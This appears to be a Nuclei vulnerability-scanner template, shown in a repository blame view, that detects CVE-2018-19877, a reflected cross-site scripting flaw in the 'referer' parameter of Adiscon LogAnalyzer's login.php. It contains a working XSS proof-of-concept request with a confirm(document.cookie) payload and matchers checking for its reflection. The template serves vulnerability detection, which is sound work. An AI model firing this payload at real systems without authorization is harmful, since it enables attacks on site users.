nuclei-templates/cves/2018/CVE-2018-19877.yaml

33 lines
821 B
YAML
Raw Normal View History

2022-07-20 07:34:46 +00:00
id: CVE-2018-19877
info:
name: Adiscon LogAnalyzer 4.1.7 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
description: |
Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
tags: cve,cve2018,xss,unauthenticated
requests:
- raw:
- |
2022-07-20 07:52:59 +00:00
GET /src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.cookie)%3C/script%3E HTTP/1.1
2022-07-20 07:34:46 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-20 07:52:59 +00:00
- '"><script>confirm(document.cookie)</script>'
2022-07-20 07:34:46 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200